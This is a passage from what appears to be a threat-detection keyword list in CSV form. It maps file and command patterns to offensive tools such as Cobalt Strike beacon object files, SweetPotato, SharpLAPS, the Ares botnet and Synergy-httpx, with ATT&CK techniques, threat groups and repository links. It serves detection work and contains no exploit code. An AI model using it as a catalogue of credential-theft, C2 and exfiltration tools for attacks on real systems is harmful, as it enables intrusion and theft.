T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.exe*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SweetPotato.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SweetPotato.ImpersonationToken*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.sln*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*sweetsoftware/Ares*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*swisskyrepo/SharpLAPS*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*swisskyrepo/SSRFmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SwitchPriv.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*SxNade/Rudrastra*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*synacktiv/GPOddity*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*synacktiv/ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*synacktiv_gpoddity*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*sync-starkiller*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*synergy_httpx.py*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*Synergy-httpx-main*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*syscall * out of bounds*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall not permitted:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall validate failed:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall_disable_priv *,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,0,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*syscall_enable_priv *,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,0,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*syscall_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*syscalls.asm*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syscalls.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*syscalls_dump.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_inject *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_inject.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_shinject *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_shspawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_spawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_spawn.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsapcspawn.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 